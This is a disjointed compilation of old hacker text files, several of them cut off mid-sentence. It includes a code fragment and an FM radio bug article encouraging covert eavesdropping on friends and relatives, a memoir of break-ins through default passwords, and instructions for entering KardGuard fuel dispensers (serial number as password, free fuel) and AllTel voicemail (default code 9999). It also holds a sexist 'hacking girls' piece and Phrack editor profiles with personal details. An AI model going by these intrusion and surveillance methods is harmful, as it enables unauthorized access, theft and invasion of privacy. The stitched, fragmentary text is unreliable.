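    """Base value to the shortest printed form, e.g. 22000 pF -> '22n'."""
    for letter, scale in sorted(prefixes.items(), key=lambda kv: -kv[1]):
        if value >= scale:
            return f"{value / scale:g}{letter}"
    raise ValueError("value must be positive")


def resistor_code_to_text(code: str) -> str:
    return format_printed(decode_code(code), RESISTOR_PREFIXES)


def capacitor_code_to_text(code: str) -> str:
    return format_printed(decode_code(code), CAPACITOR_PREFIXES)


def resistor_text_to_code(text: str) -> str:
    return encode_code(parse_printed(text, RESISTOR_PREFIXES))


def capacitor_text_to_code(text: str) -> str:
    return encode_code(parse_printed(text, CAPACITOR_PREFIXES))


# Values copied from the article's component list.
ARTICLE_RESISTORS = ["470R", "10k", "47k", "68k", "1M"]
ARTICLE_CAPACITORS = ["10p", "39p", "1n", "22n", "100n"]


def bill_of_markings() -> dict:
    """Map every printed value in the parts list to the marking to look for."""
    return {
        "resistors": {v: resistor_text_to_code(v) for v in ARTICLE_RESISTORS},
        "capacitors": {v: capacitor_text_to_code(v) for v in ARTICLE_CAPACITORS},
    }


if __name__ == "__main__":
    for kind, table in bill_of_markings().items():
        for printed, code in table.items():
            print(f"{kind[:-1]:9s} {printed:>5s} -> marked {code}")
```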


HOW IT WORKS 


The FM bug circuit consists of two stages: an audio amplifier
and an RF oscillator stage.

1. THE AUDIO AMPLIFIER STAGE


The microphone detects audio in the form of air vibrations that
enter the hole at the end of the microphone and move the diaphragm. The
diaphragm is a thin piece of metalised plastic and is charged during
manufacture. Some of these vibrations pass down a lead which touches it
and into a FET transistor. A FET transistor has a very high input
impedance and does not have a loading effect on the charges. The audio
then gets passed through a BC 547 transistor which amplifies the sound
around seventy times. The BC547 then passes it to the base of the
oscillator stage.


2. THE OSCILLATOR STAGE


The 47k resistor picks up the pulse from the transistor and then
turns the second or oscillator transistor ON, but the 47k resistor has a
value such that it will not turn the transistor on fully. So the feedback
pulse from the 10p capacitor turns it ON fully.

Normally a transistor is turned ON/OFF via the base, however it
can also be done by holding the base firm and varying the emitter
voltage. In the FM bug this is what's done: the 1n capacitor holds the
base firm and the 10p feedback capacitor varies the emitter voltage.
However for a capacitor to do this the emitter must have a DC voltage
that can be increased and decreased. The DC voltage is about 2V and the
base will be 0.6V higher than this, so the base voltage is fixed at 2.6V
by the 1n capacitor. The voltage does not rise or fall when the
oscillator is operating, only when the audio is injected into the base
via the 100n capacitor. This is how the circuit works and it continues like
this at a rate of about 100 million times per second.

The oscillator is designed to operate at around 100MHz, however
this figure is dependent on a lot of factors such as the 6 turn coil,
the 10p capacitor and also the 470R and 47k resistors, and the figure of
operation is about 90MHz (my FM bug operated at 88.5MHz).


GETTING THE BUG READY FOR ACTION 


Ok so you have built the bug now and are ready to use it. Well,
first of all you will need some sort of FM radio. Alright, put the bug
next to or near the radio's antenna. Turn the bug and the radio on.
Alright, starting from the bottom end of the radio's FM scale, slowly
progress your way through the FM band. Usually your bug will tend to be
around the 85-95MHz range. Once you hear a beep (because your bug is
close to the radio) or any other strange static noise, stop. Alright, you
might have been lucky and your bug is exactly tuned already, however in
most cases you will need to adjust your bug slightly. Using a small
screwdriver slowly turn the air trimmer; whilst doing this babble out
some words, and stop turning when the echo of your voice through the radio
becomes crystal clear. Your bug is now tuned and you are ready to put it
to use.

You might have some problems with your bug's frequency being
exactly the same as a radio station's. No problem, by compressing or
uncompressing the coil you can change your bug's frequency. Use the coil
method if your bug is in the middle of a few radio stations' frequencies;
if you just need to move it up or down one or two MHz then use the air
trimmer.


PUTTING THE BUG TO USE 


Many of you already have your ideas on how to use the bug.
Remember it might be illegal in your Country/State/city to use this bug
in the way you intend. Hey, it's up to you, I don't mind, however I take no
responsibility if you get in trouble.

Anyway here are a few "friendly methods":

1. CHRISTMAS. Yes it will soon be that time of year again, and
this time also brings a great opportunity to discover some of those
family secrets or maybe even find out what lame presents those relatives
have brought you and save you from the disappointed face they will see
when you open it.

Okay, put the bug either in the pot the tree is standing in or
fasten it to a branch relatively close to the bottom of the tree. We
place it at the bottom of the tree because the antenna needs to be
extended if we want really cool range. Okay, put the bug in its position
and then unravel the wire all over the tree.

2. TV listening. Okay, if you are out in the backyard, whether it's
because you want to be, or there is some chore that needs to be done, you
can listen to a favorite TV show, or a basketball game or such. I know
you're saying why not listen to the radio; well, you now have a choice of
listening to a radio station or one of the 10000000 TV channels your
state offers you.

Set the bug up about 3-5m away from the TV, then adjust the TV
volume so that it is just right to hear on your radio.

3. Bug-a-friend. Okay, you can bug your friend to see what he/she
is up to. Okay, you will need to know where your friend goes and then
go there beforehand and set up the bug and your listening point. Make
sure that you set up a place where conversation happens; it is very
boring listening to insects and such.

Conceal the bug anywhere within a 3-5m radius of where your
friend talks and stuff. Now conceal yourself and then sit back and
listen.

Now those are a few of the more "legally friendly" methods;
there are thousands more not-so-friendly and even malicious
methods <Oooooooo> that I will leave up to your imagination.


CONCLUSION 


I hope the information contained can help you successfully build a bug,
and then good luck using it. If you have trouble just e-mail me. If you
can not get hold of some of the components, you can order them through
me. Also if you want a bug, but don't have the electronic skill to do it,
you can buy pre-built bugs through me.. just e-mail me. May the force be
with you.

Obi-1.


My short time as a hacker. 
by Kwoody 


I live in a small town in northern British Columbia where the city 
owns the phone company. All of BC is serviced by BCTel, except here in 
Prince Rupert. The phone company used, up until 1991, mechanical 
switches, no lie! Tech dating back to the 50’s sometime. I know this 
because I know some of the workers of CityTel. (The name of the phone 
company). Because of this they were not able to offer all the goodies 
like Caller ID, Call Forward etc...and it was easy to hack then, not 
the phone company, but all the other systems in this small town of 
16000+ people. 


I got into hacking sort of accidentally. I have had a computer and modem
of one kind or other since about 1983. I moved here after high school
in 1986 and found a good paying job I have worked at for the last 8
years. One night in 1990 I was sitting around with my roommate
having a few beers and decided to call a buddy of ours to come over
but I dialed the number wrong and got a computer tone. Cool I
thought... I knew the numbers of the 2 local BBS's and that wasn't one
of them.


I fired up the computer and called it again. I got the prompt: 
Xenix 386 Login:. 


I had some knowledge of other OS’s and knew this was some kind of Unix 
box. A friend of my roomie was going to university (UBC) and he 
happened to phone that night. I chatted with him for a bit and told 
him what I had found. He told me to try sysadm or root. I got in with 
sysadm, no password! 


I found that I had complete control of the system and it belonged to 
the local school board. I bought a book on Unix and learned as much as 
I could about the system and Unix in general. I guess being a rookie 
(read lamer?) and not knowing shit about how to cover my tracks they 
discovered the system had been hacked and shut down the dial-in. They 
went back online a few weeks later and left sysadm wide open no 
password again. I could not believe it! Even after being hacked they 
still left their system open like that. 


By now I was hooked and I wanted to see if there were any other
systems in town. I could program a little in Pascal and basic (lame)
and tried to write a dialer of some kind. No go...so instead I figured
out the script language of Q-modem and wrote a 40 line script that
worked. It dialed all numbers sequentially but I did not worry too
much about being caught since the switch they used was so ancient
because they didn't have caller ID or anything like that yet.


I did not know at this time of the hacker community and some of the
programs available that would do this already. And even if I did I
wouldn't have known where to call and get them. At any rate I had two
computers, an XT and a 386, both with modems and two phone lines, one I
used as my normal voice line and one for data. I setup the dialer on
both and away I went. By the time I had finished scanning both the
prefixes, 624 and 627, I found about 30 computers. Of those I was able
to get into about 10. All of them used defaults and all except the one
below were Unix boxes.


Although I did find one number that connected at 1200 I think it 
belonged to the phone company. After I was connected nothing would 
happen. I tried for a while to get a prompt of some kind then suddenly 
a line of text appeared that listed two phone numbers and some other 
stuff that I cant remember. So I just left it alone for a while to see 
what came up. It soon became clear that the numbers in one column were 
always one of 4 numbers. RCMP, Fire Dept, Battered Womens Shelter and 
a second RCMP detachment. It looked like it recorded all calls coming 
into those 4 places. 


One hack I did was on a system that dispensed fuel. It was called a 
KardGuard 3000C. I knew of two places in town that had these systems. 
One was where I worked and the other was our competitor. And since I 
knew how it worked it was easy to get in. I saw their volume of fuel 
dispensed and such and could have done really nasty things like erase 
their transaction buffer or get free fuel from them. But I didnt since 
I did not see the point in hurting them or their system even if they 
were our competitor. 


For those of you who might find such a system I'll give a brief run
down on it. The hardware is limited to 300 bps 7E1 and consists of a
few things.


You can tell the system as it announces it when you connect:

KardGuard 3000C Motor Fuel Dispensing System.
PASSWORD:

The system uses punch coded cards read by a card-reader. You have a 4
digit security code that you need to activate the pump to dispense
fuel. Everything is kept track of by a computer that reads the amount
of fuel pumped, date, card number and a few other things depending on
how the card is coded. Like odometer reading or car number.


Now to get into this system via dial-in all you have to know is the
Serial Number of the system. All of these type systems use the serial
number as the default password to access it via dial-up. And it's easy
to get the serial number. If you know the location of the card-reader
go and look on the side of it. Generally the actual card reader is
housed in a metal box. On the side of the card reader itself near the
back is a small sticker and the serial number will be written on the
sticker. That was how I did it. I just went to their card reader and
took the serial number off it and got in.


Once in you can do any number of things. Shut off the pumps or
manually activate them without a card and get free fuel, see how much
of any product was dispensed. Products range from 0-15. 0 being
regular gas, 1 regular unleaded etc. It is fairly limited of what you
can do but you can do some nasty stuff to the company who owns it if
you know how. A note to this: all commands must be UPPERCASE. And all
commands are one letter. Like E is for looking up the 4 digit code for
individual cards. I don't remember all of them as we upgraded to the
latest version of the KardGuard which supports up to 14.4k and is a
faster system.


After about 3 months of this sort of stuff I was at work one Saturday 
and got a phone call from a Constable Burke of the RCMP Special 
Investigation Unit. 


He informed me that he knew about my hacking and would like to take a
look at my computers. I told him that I didn't know what he was talking
about, he just said we could do this the hard way and he could get a
warrant to search the place. He wanted to meet me at my place in 10
minutes. I said ok. I was shitting bricks by this time. I phoned my
roomie and told him to get all printouts and disks out of the house
and take them away...anywhere. I took off home and got there to find
my roomie gone with all printouts and disks. I fired up the computers
and formatted both HD's. Formatting a hard drive had never taken so
long before!!


I waited for like an hour...no sign of the cops. My roomie came back
and said where are the cops? I don't know I told him. I waited some
more still no sign of them. I got a call about 3 hours later from a
friend of my roomie and he asked if Constable Burke had showed up. I
asked how he knew about that and all he did was laugh his ass off! Now
I was thinking joke...bad joke...and it was. I managed to find out
that this "friend" had gotten someone to pose as a police officer and
call me to see my computers regarding hacking. Well the guy he got to
pose as a cop did a good job at fooling me. I guess I was just over
paranoid by this time. Plus I was really pissed as I lost a lot of
info that I had acquired over the previous months when I formatted my
hard drives.


I guess my roommate had been telling a few people about what I was
doing. I was more than a little pissed off at him as I had not told a
soul of what I was doing since I knew it was illegal as hell. I got my
disks back and burned the printouts and laid off the hacking for a few
weeks. I started up again and was a tad more careful. I didn't keep any
printouts and kept the info on disk to a minimum.


Then about a month later my roommate, who worked for our landlord,
came home one day and said that our landlord had been approached by
some RCMP officer regarding me and my computers and what I might be
doing with them. I said is this another joke? No he said, go talk to
him yourself. I did but he wouldn't tell me much except that something
was definitely going on regarding me, my phones and my computers. And
the RCMP were involved.


After asking around I found out that quite a few people knew what I
had been up to. All they knew is that I was some guy who had been
cracking systems in town. But word had spread and I still don't know
how the cops found out or how much they knew.


But after talking to my landlord I quit right there and then. I went 
home formatted the drives again, all floppies and got rid of 
everything. I had hacked my way through everything in town that I 
could in about 6 months. Also by this time CityTel had upgraded their 
switch to some of the latest tech and had Caller-ID installed along 
with all the other goodies you can get these days. It was definitely 
time to quit. 


Not long after I started a BBS that I still run to this day. I figured
that was a way to kill the hacking urge and be legit. I don't live with
that roommate anymore. I'm married now and still think about it now
and again but have too much to lose if I do and get caught.


On another note about 3 months ago I was at work and dialed a wrong 
number. As fate would have it I got a blast of modem tone in my ear. 
My old hacker curiosity came alive and I made note of the number. We 
have a small lan at work that has a modem attached and when I had a 
free moment I dialed the number up. I got the banner: 


city telephones. No unauthorized use. 


XXXXXXxX <----a bunch of numbers 
username: 


I hung up right there but it was interesting to see that I had found 
CityTel’s switch or something of that nature. 


To this day I don't know if there were any other hackers in this small
city where I live. As far as I know I was the only one that did any of
this sort of thing. It was fun but near the end I could feel the noose
around my neck. And I quit while the quitting was good.


Today I help admin our small lan at work with 2 servers and 8
workstations and the Unix I learned hacking helped me when my boss
first started to get serious about computerizing the business. Since
then I have been able to help setup and maintain the systems we have
today.


I'll give the specs on our new KardGuard if anyone is interested as I 
know they come from the States and there must be more than a few out 
there. 


kwoody 

USING ALLTEL VMBs
By Leper Messiah

Ok. This is everything you need to know in hacking AllTel Mobile's
Voice Mail. The default password on all their boxes is 9999.
Here are the docs, word for word. Enjoy!

Features
-=Basic=-
Accessing your mailbox
Changing your security code
Recording your name
Recording a personal greeting
Playing a message
Recovering deleted messages
Playback mode options

-=Enhanced=-
All of the Basic Features plus...
Setting up your greeting schedule
Replying to a message
Redirecting a message
Recording and sending a message
Creating a broadcast list
Personal greeting schedule


At a glance

VOICE MAIL SET UP                          Press
To change your security code               8 2 3
To record your name response               2 3 3
To record your personal greeting           2 2 3
To edit a greeting in your schedule        2 2 7
To activate your greeting schedule         2 2 8
To change your playback mode               8 8 3

SENDING AND RECEIVING MESSAGES             Press
To play a message                          1
To save and play the next message          2
To reply to a message                      3
To redirect a message                      7
To create and send a message               3


Accessing your Voice Mail 


1. Access your Voice Mail. 
From a cellular phone press 
# 9 9 Send. 
From a landline phone dial your 
cellular phone number, which will 
automatically transfer to your voice 
mail and press # when greeting begins. 


2. Enter your security code. 
Creating/Changing your security code 


1. Access your Voice Mail. 
2. Press 8 for Personal Options. 
3. Press 2 3 to change your security code. 
* Note: Your security code can contain 1 to 7 digits. 


Recording your name

1. Access your Voice Mail.
2. Press 2 for your Greeting Menu.
3. Press 3 3 to record your name.
4. Record your name, finish by pressing #.
Options
Press 3 1 to play your name.
Press 3 3 to erase and re-record your name.


Recording a personal greeting

1. Access your Voice Mail.
2. Press 2 for Greeting Menu.
3. Press 2 1 to play your greeting.
4. Press 2 3 to record your greeting,
record your greeting, finish by pressing #.

Playing a message

1. Access your Voice Mail.
2. Press 1 to play your messages.
3. Message will play.
Options
Press 1 to keep this message
as new and play the next.
Press 2 to save and play the
next message.
Press 3 to reply to a message.
Press 4 4 to replay a message.
Press 5 to erase a message.
Press 7 to redirect the message.
Press 8 8 3 from the main
menu to choose a playback mode.*
Continue to press 8 3 until the
desired playback mode is selected.


* Note: The system has three playback modes: 
normal, automatic, and simplified. 


Recovering deleted messages 


To recover a message that has been deleted: **
Press * 1 to go to the main menu,
Press * 4 to recover all deleted messages.

** Note: Deleted messages can only be recovered
before you exit the mailbox.


Replying to a message 
From the Play Menu: 


1. Press 3 during or after a message.
2. Record your reply, finish by pressing #.
3. Press 3 to continue recording a voice message.
Press 5 to erase a message.
Press 7 to select a special delivery option.
4. Press 9 to address the message.
If sent from a subscriber's mailbox,
the reply will be automatic. If not, enter
the mailbox number.


Redirecting a message 
From the Play Menu: 


1. Press 7 during or after a message.
2. Press 3 to continue recording a
voice message.
Press 5 to erase a voice comment.
Press 7 to select a special delivery
option.
Press 8 to play the original message.
3. Press 9 to address the redirected message.
Enter:
a. mailbox number
b. broadcast list number.


Recording and sending a message 


1. Access your Voice Mail. 
2. Press 3 to record a message. 
3. Record your message; finish by pressing #. 
   Press 3 to continue recording a 
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voice message. 
   Press 4 4 to review the recorded message. 
   Press 5 to erase a message. 
   Press 7 to select a special delivery option. 


Press 1 to mark a message urgent. 
Press 2 to mark a message confidential. 
Press 3 to select notification of non-delivery. 
Press 4 for future delivery. 
Press 5 to delete special delivery tags. 
4. Press 9 to address a message. 
Enter: 


mailbox number 
broadcast list 
0 + last name - 0 + first name 


Creating or editing a broadcast list 


1. Access your Voice Mail. 
2. Press 6 to access your broadcast list. 
3. Press 3 to create or edit a broadcast list. 
4. Enter a one- or two-digit broadcast list number. If new list, select 
   any one- or two-digit number. If editing, enter the one- or two-digit 
   number assigned. 
5. Enter all of the destinations. Press # after each destination entry. 
   (Destinations can be mailbox numbers or broadcast list numbers.) 
6. Press 7 3 to record a name for your broadcast list. 
7. Press # when finished. 


Setting up your greeting schedule. 


Press 2 from main menu. 
Press 2 6 to select your active greeting. 
Enter the greeting number you want active. 
Press 2 7 to edit a greeting. 
Enter the greeting number to be edited. 
Press 1 to play the current greeting. 
Press 3 to record a greeting. 
Press 5 to erase the greeting. 
Press 7 to change the time 
interval for this greeting. 
Press 8 to review the time interval 
for greeting. 

6. Press 2 8 to activate/deactivate 

your greeting schedule. 




Message waiting notification 


1. Press 8 for Personal Options menu. 

2. Press 6 for Notification Options. 

3. Press 1 to play notification telephone number. 
Options 


Press 6 to enable/disable 
message notification. 


AT ANY TIME DURING A MESSAGE PRESS 
To replay the date and time stamp of the message    8 8 
To rewind by 6 seconds                              4 
To rewind to the beginning of a message             4 4 
To fast forward by 6 seconds                        6 
To fast forward to the end                          6 6 
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[To stop and function 
To return to the main menu 




Good luck hacking. 
-- Leper Messiah 


Hacking At Ease for the Macintosh 


Introduction: 


Some educational institutions and businesses use At Ease to 
discourage the pirating of programs and access to sensitive files, 
generally screwing up any fun you would have! 


know how to be rid of it?? 


How to: 


this will tell you how to remove the password for At Ease 
so you can gain access to the Finder, 
password to one of your chosing, 


5.1 or 6.0 


Well, 


First off, 
(Norton Utilities Disk 
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Hackin’ GIRLS ’n SYST 
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by SevenUp sec@sec.d http://www.sec.de/sec/ 


Hitting on girls and hitting on systems (I’ll call them both "targets") 
has quite some similarities. If you are good in hacking one of them, 
it won’t be too hard to enter the other one. 

It also represents IRC channel #hack’s current state of mind: 
Women’s talk is taking over. 


- Biggest Challenge: 
  To get inside the first time 


- Targets that have already been successfully hit by others lose a lot of 
  their attraction 


- The goal is to keep as many successfully (formerly virgin) targets as 
  possible 


- Different game: Hit one target from every region 
- Mark every target you hit 


- You don’t really care much after you got your target, unless (in rare 
  cases) you love it 


TIPS FOR BECOMING SUCCESSFUL 
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Key to Success: 
The right "defaults", depending on situation and targets 


Be Cool: 
Don’t care too much about the target. Don’t get involved 
emotionally, but play a little with the target. 


Knowing different languages and keywords may be useful with targets 
of different origins 


Social Engineering and spending time (sometimes money) might lead to your 
goal easier 


The more targets you’ll hit on, the more you’ll succeed. Just ignore any 
failings. Remember: Better to have tried (and maybe lost) than not to 
have tried. 


Best time to find targets is at night 


Backdoors are always inviting (sometimes even dangerous) 


Don’t start with the top target. Start slow and easy and look for more 
difficult ones after some success 


If you get rejected on the first time, don’t give up. There is always 
a second chance 


When you just got little time to hit on the target, don’t hesitate: 
a quick first try is never wrong and leaves you more time to think about 
your second step. 


Scanning (and probing) is necessary. Don’t give up, even if your rate of 
success lies somewhere between 1% and 50% 


SELECT THE RIGHT ONE 


Be selective about your targets! 


Try targets with tight openings 


Targets with many users have more experience 


Targets with shadows / shades are harder to enter 


From the inside it’s easier to reach the root-climax than from the 
outside 


Many targets look uninviting from the outside, but welcome you deeply 
inside 


Some targets are leaking even before touching them 


If a target blows, it sucks 


TECHNIQUES FOR MORE FUN 


After entering it, let the target become active too! Let it do some work 
and see what comes up. 


To protect your target, close all openings and save the key 


Even some targets that suck can be nice 
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— Sniffing Targets: 
For lamers and perverts 


- Fingering Targets: 
  Can be interesting... 


- Leeching targets dry makes fun, takes time and lets them become 
  kinda useless 


- The right wrapper controls the intrusion and its consequences 


WARNINGS 


- Remember: The number of tries is limited. After unsuccessful hits, the 
  target and its environment will become aware; start searching in a new 
  area 


- NEVER just pay to get into a target 


- Don’t fall for booby traps! 


- When calling up targets, make sure their owner doesn’t notice 
- Don’t use crack on the target... it fucks up the brain 


- Don’t fuck (up) the targets without protection 


- Be aware: Some targets with change-root-environments can fake the 
  root-orgasm, or make you feel coming inside when you are not inside 


- Penetrating a target too hard could use up or damage your tools 


- Try to identify faked and "cross dressed" targets before totally unwrapping 
  them and finding a bad surprise 


- When entering a virgin target the first time, you have to wipe the tracks - 
  this can often be messy 


- Remember to get out of the target when you fall asleep 
- Never lose your mind over the beauty of a target. Always check for guards. 


- If you don’t watch out, you may get a lifelong sentence after a 9 month trial. 
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==Phrack Magazine== 


Issue Forty-Eight, File 5 of 18 


-:[ Phrack Prophile ]:- 


This issue, we have a "very special episode" of the Phrack Prophile. As 
everyone knows, Phrack is once again in flux, and an entirely new editorial 
staff is coming on board. In an effort to introduce everyone to these three 
hackers, we’ve had them do profiles. Ladies and Gentlemen (yeah, like any 
ladies OR gentlemen read Phrack), meet your new editors: Daemon9, ReDragon 
and Voyager. 


Prophile on Daemon9 


Personal 


Nomenclature:   daemon9/route/infinity 
In real life:   Mike D. (as in David, not Diamond) S. 
DOB:            10.05.73 
Likes:          Women who aren’t afraid to cry. 
Dislikes:       Hippies. GOD, I hate hippies... 
Ink:            Large back piece, and growing... (It’s the outline of 
                a die. (No, not as in a pair of dice, but as in a 
                computer chip...) 
Other:          Glock 19 with trigger-guard mounted laser-sight 
Passions:       Computers. Computer Security (or lack there of). 
                Health. Mental and Physical aptitude. 
Main URLs:      http://www.infonexus.com/~daemon9 
                ftp://ftp.infonexus.com/pub 
                mailto://route@infonexus.com 
                mailto://daemon9@netcom.com 


Hardware 


Years with Computers: 14ish 
Computers Owned: 
  Towers:   P90/32MB/3GIG (Windows NT/Solaris/DOS-WFW) 
            P120/32/2GIG (Linux), 486-66/16/700MB (FreeBSD), 
            486-50/16/540 (Linux) 
  Mids:     P133/16/800, (Windows NT/Linux) 
  Laptops:  486-75/16/500 (DOS/WFW) 
Networks Owned: The Information Nexus (infonexus.com) 


Music:    Front242, FLA, The Goats, NIN, Diatribe, 16Volt, 
          Morphine, etc... 


Movies:   Usual Suspects, Miller’s Crossing, Sneakers, Fletch 
          Army of Darkness, True Romance, NBK, etc... 


Books:    TCP/IP Illustrated vols. I-III, UNP, Applied 
          Cryptography 2nd edition, Computers and Intractability: 
          A Guide to the Theory of NP-Completeness, and so on... 


A Bit of History 


Ah, the days of my youth... Carefree, happy-go-lucky, life was a big 
open door to me. One spring a very good friend of mine told me I should get 
an ‘‘Internet’’ account to write him mail while he was away at school. 
"Huh?" 
...Was my concise reply. I was deep into the computer thing at that time, 
but I had not gotten into the Internet yet. Well, we went out and bought 
a (at the time) $200 2400 BPS modem and got me hooked up with this brand new 
service provider, NetCom Online... At first I merely used the thing for 
email, but soon after I taught myself all about Unix, I discovered all the 
wonders of Usenet and IRC (AKA the Big Waste). Most people know me from my 
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frequent alt.2600 presense. That’s where I met Voyager. We quickly found 
that we had the same interests as far as computers and hacking went. The 
rest is history... Sorta. 


The Theory Behind It All 


When I look back and try to figure out how the hell I got here, I have 
one person to thank. My father. He bought me my first Commodore 64. I can 
remember hooking that archaic thing up to my TV, writing my own adventure 
games in basic, and saving them to a tape drive. My computer time line goes 
something like this: 


c64 Apple IIc IBM XT IBM 286 486/33 486/66 P90 486/66 486/50 P120 P133... 
1982 1984 1986 1987 1991 1992 1994 1995 1996 1996 1996 


I am not happy unless I am bathed in a constant stream of extraneous 
RF radiation. My room is alive with a myriad of blinking and flashing lights, 
several humming fans, and hundreds of feet of fire-hazard-inducing cables. 
I have to put tin-foil on all of my windows just to keep the sun out and the 
temperature down. You’d be amazed how well that works. 


The pursuit of knowledge is what led me down the path I am following. 
I am simply not satisfied with knowing that something works. I need to 
know why and how, and how to break it and then how to fix it... I do not solve a 
problem by merely finding a work-around. I slam head on into the fucking 
thing and work with it until a solution presents itself. 


Intelligence, to me, is not what you know, or how much you know. It is 
the ability to reason logically and rationally when the need arises and, if 
pragmatism is not the best approach, let intuition and chaos guide you. 
Intelligence is adaptive and ever-changing... Memory capacity is too often 
mistaken for smarts... 


People I Know 


Linenoiz: The reason I fell into the whole Internet scene to begin with. 
Best friends for 12 years, I would not be where I am now 
without him. He is one of the most intelligent people I know. 


Nihil: The reason I fell into the whole hacking scene to begin with. 
We have had our differences over the years, but our computing 
interests are too similar to let petty squabbles come in the 
way of our friendship. The other one of the most intelligent 
people I know. 


Mythrandir: I met Myth about 2 years ago on alt.2600. Sharp kid. Very sharp. 
We think so alike on some things it’s freaky. We’1ll get going 
on that Tiger Team soon enuff, Jeff...! 


Alhambra: Strong coder. We did the DemonKit for Linux (and are still 
working on it..;)). Jeremy and I also have very similar 
interests as far as hacking goes. I am glad he is here 
with me in the Guild. I need more people like him. Not a 
risky gambler, but hey, I took care of that for both of us... 


Halflife: Coder supreme. 


Shouts Out To 


Brent, Carrie, ColdFire, Crow, Halflife, Heather, Jason, Jen, Kev, 
Ka_mee, MikeP, Mudge, Shawn, SirSyko, Tim, Tom, Topher, Xanax, Vision 
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What I Have Done 


It used to be that you could find me in that group like clockwork. I 
was always there. Reading, posting, flaming, lurking. That was me. For 
years. This is where most people probably first remember me from. I took 
it upon myself to self-moderate and answer all the questions I could possibly 
handle... I usually posted several times daily. At last count, I posted over 
2100 times (according to ~/.tin/posted). I was prolific. I have fond memories 
of back then... But, times have changed. That group has gone almost completely 
to hell (AKA the way of #hack). These days, it’s a fucking miracle if I find a 
worthwhile thread to follow-up to... These days, look for me on comp.security.*, 
comp.protocols.tcpip, sci.crypt, alt.security.pgp and so on... 


Oh yeah, I wrote some code and a few rag-tag articles for some Zines 
out there. Can’t remember the names... 


the Guild 


The Guild is my group of rowdy Internauts. I started the group about 
20 months ago for several reasons, some of which are just *now* becoming 
clear to me. For a while there, we were putting out a zine, The Infinity 
Concept, but that is on hiatus while I do Phrack. Various members have done 
coding and exploits. Look for more to come from the Guild... 


ftp.netcom.com/pub/da/daemon9 


Somewhere along the line about 2 years ago, I started to take 
advantage of netcom’s free 5 megs of ftp space. I put together a modest 
collection of tools and whatnot (under 6 megs of stuff). For some yet 
undiscovered reason, people flocked to the site. I have no clue why. It 
wasn’t *that* great. What I find even more fascinating is the fact that 
to this day people *still* go looking there for hacking paraphernalia. 

The site has been vacated for almost a year now. If you are reading this 
and still have a link to my O-L-D netcom ftp site, UPDATE it to point to 
ftp.infonexus.com. I am *much* more proud of this site... Hundreds of megs 
of top-notch stuff here. Anyway, the netcom site went down because Brian 
Smith (at the time the only member of the netcom security staff) told me I 
couldn’t have certain tools there for distro. When I ignored him, he froze 
my account. This was the final catalyst in me deciding to start the 
Information Nexus... 


the Information Nexus 


Ah yes... The InfoNexus... My frustration with Netcom led me to do 
what I had been wanting to do for some time, start my own site. This site 
would be a Haven for hackers, a place where they could come and be sure to 
find only the finest in technologies and tools. A place of much learning and 
information trade. A knowledge dumping ground. Thus was born the Information 
Nexus. With anywhere from 6-10 machines the Nexus is a heterogenous 
environment: the OS’s range from several Unix flavors, several versions of 
Windows NT, and, of course, the mundane stuff (like DOS/WFW). The main box, 
Onyx, is a heavily tweaked Linux machine. It is a P120 with 32MB RAM and 2 
GIGs of HD space. 

As it stands now, accounts are given on a restricted basis, only to 
friends and people I know (or people whose reputation precedes them). As soon 
as I upgrade the link from a 28.8 modem I will start offering accounts to the 
masses, at a nominal fee. I will also open up ftp access, allowing a greater 
number of users at all hours. 
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The Infinity Concept 


TIC is the zine the Guild put out. Some of the noteworthy subjects 
written on: Cryptography, Windows NT security, Unix security, the security 
of PGP, and several coding projects... We have done 3 issues to date, but 
I have stopped further production of the zine to devote my full attention to 
Phrack magazine. 


Phrack Magazine 


Several months back, I hopped on IRC with some of my Guild-mates and 
was having a wondrous discussion on, oh, nothing. Well, Voyager was on, and 
he dragged me into a private chat. He told me about ErikB stepping down, and 
told me he and ReDragon were to take over as the new editors... I was very 
happy for him, and told him I would have jumped at the chance to do it. That 
was his next question... Since then, ReDragon, Voyager and I have been 
salivating like dogs waiting to get our hands on the legend that is Phrack 
Magazine. 
My pledge is twofold: Timely distribution and nothing but the highest 
quality articles. We will be distributing Phrack on a regular seasonal 
rotation and will weed out all but the top-notch articles. I plan to write 
at least one article per issue. I promise this much: You will not be 
disappointed... 


Prophile on ReDragon 


Personal 


Handle: ReDragon 
Call Him: Dave 
Past Handles: Dr. Disk (circa ’84), The Destroyer (circa ’88) 
Handle Origin: Thomas Harris Book, Saab insignia, D&Dish sort of 
name, then I decided it would be cooler (and original) 
if it was all one word and one D. 
Date of Birth: 12/30/75 
Age of current date: do the math yourself 
Height: 5’ 11" 
Weight: 175 
Eye Color: Green 
Hair Color: Brown 
Computers: Apple ][e, Atari 800, 8088, 386sx/16, 386dx/40, and 
right now a 486/33 


I got my Hayes Micromodem //e in the summer of ’84. I was eight years old 
and with the help of my babysitter begged my way onto an H/P board. I used 
to read Phrack and write BASIC code, I was quite the clueless newbie for a 
while. People say age doesn’t matter, but it does when you are that young. 
My lameness continued, I learned Pascal, the years passed, and I started to 
figure out how things worked. I discovered Unix, it was cool. I learned 
what Crack was, I used it. Years passed I started to figure out how things 
worked. I would go into more detail but I don’t really care to tell the 
world about my life, ask me privately if you care. 


ReD’s Favorite 


Foods: Taco Bell (doesn’t everyone?), Young animals killed cruelly 
Music: Pink Floyd, Beatles, anything not techno 
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Leisure: IRC is bad for you, just say no. 
Alcoholic Fun: Bottled beer, Jaegermeister, Long Island Iced Teas 


Most Memorable Experiences 




Saab car trouble in Queens on the way to HOPE. 
Saab car trouble on PA Turnpike on way back from Pumpcon. 

Saab stranded on George Washington Bridge on way to SummerCon ’95. 
Saab finally breaks down on NY Turnpike on way home. 

SummerCon ’95 (memorable that I don’t remember any of it) 
SummerCon '96 (the worst organized con I have ever been to) 


The Green Machine (for altering my life more than I can imagine) 

Acker (even though you gave up on it all, wish I knew what you were doing now) 
Bluesman (why didn’t you tell me about C earlier?) 

Zorgo (for ruining my life showing me IRC) 

Wozz (I still don’t believe you grew up there) 

r00t (you’re all a bunch of idiots, but i love you) 

Asriel (we are pretty similar people, except I’m not a narq) 

Max-Q (screaming at me "Nice Fuckin’ Con!" after Summercon ’96, I was touched) 
Taran King (you were cool to me when I was nobody, I was impressed) 

Sirsyko (only hacker I know that I actually trust) 

ErikB (annoying him enough made for an interesting summercon and a new phrack) 
lOpht (for bringing back what hacking is really about) 

b (stuff?) 


Why Phrack? 


I have been in one way or another involved in the "hack scene" for more 
than half my life. I spent a large part of that on the lower end of the 
knowledge ladder, and throughout it all few people helped me along directly. 
What I recognize though is that there have been scores of people that have 
spent their time, at no personal gain to themselves, to help educate others 
about something that they know a bit more about than the rest of us. 

I read a lot of books to learn about hacking; I paid for them and the 
